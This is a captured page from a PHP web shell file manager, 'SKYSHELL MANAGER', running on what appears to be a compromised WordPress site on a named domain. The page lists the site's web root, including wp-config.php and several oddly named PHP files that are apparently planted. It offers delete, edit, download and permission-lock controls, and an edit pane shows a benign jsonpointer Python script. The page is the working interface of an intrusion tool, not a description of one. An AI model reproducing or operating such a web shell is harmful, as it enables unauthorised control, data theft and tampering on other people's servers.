📁
SKYSHELL MANAGER
PHP v8.3.31
Create
Create
Path:
root
/
home
/
nginx
/
domains
/
asiawebawards.com
/
public
/
Name
Size
Perm
Actions
📁
.claude
-
0770
🗑️
🏷️
🔒
📁
.well-known
-
0770
🗑️
🏷️
🔒
📁
cgi-bin
-
0770
🗑️
🏷️
🔒
📁
wp-admin
-
0775
🗑️
🏷️
🔒
📁
wp-content
-
0775
🗑️
🏷️
🔒
📁
wp-includes
-
0775
🗑️
🏷️
🔒
📄
.htaccess
2 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
.user.ini
0.54 KB
0660
🗑️
🏷️
⬇️
✏️
🔒
📄
CLAUDE.md
3.09 KB
0660
🗑️
🏷️
⬇️
✏️
🔒
📄
classwithtostring.php
237.85 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
5.2 KB
0660
🗑️
🏷️
⬇️
✏️
🔒
📄
filefuns.php
6.05 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
4.45 KB
0660
🗑️
🏷️
⬇️
✏️
🔒
📄
style.php
13.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.63 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.63 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0664
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0000
🗑️
🏷️
⬇️
✏️
🔒
Edit: jsonpointer
#!/usr/libexec/platform-python -s # -*- coding: utf-8 -*- from __future__ import print_function import sys import os.path import json import jsonpointer import argparse parser = argparse.ArgumentParser( description='Resolve a JSON pointer on JSON files') parser.add_argument('POINTER', type=argparse.FileType('r'), help='File containing a JSON pointer expression') parser.add_argument('FILE', type=argparse.FileType('r'), nargs='+', help='Files for which the pointer should be resolved') parser.add_argument('--indent', type=int, default=None, help='Indent output by n spaces') parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + jsonpointer.__version__) def main(): try: resolve_files() except KeyboardInterrupt: sys.exit(1) def resolve_files(): """ Resolve a JSON pointer on JSON files """ args = parser.parse_args() ptr = json.load(args.POINTER) for f in args.FILE: doc = json.load(f) try: result = jsonpointer.resolve_pointer(doc, ptr) print(json.dumps(result, indent=args.indent)) except jsonpointer.JsonPointerException as e: print('Could not resolve pointer: %s' % str(e), file=sys.stderr) if __name__ == "__main__": main()
Save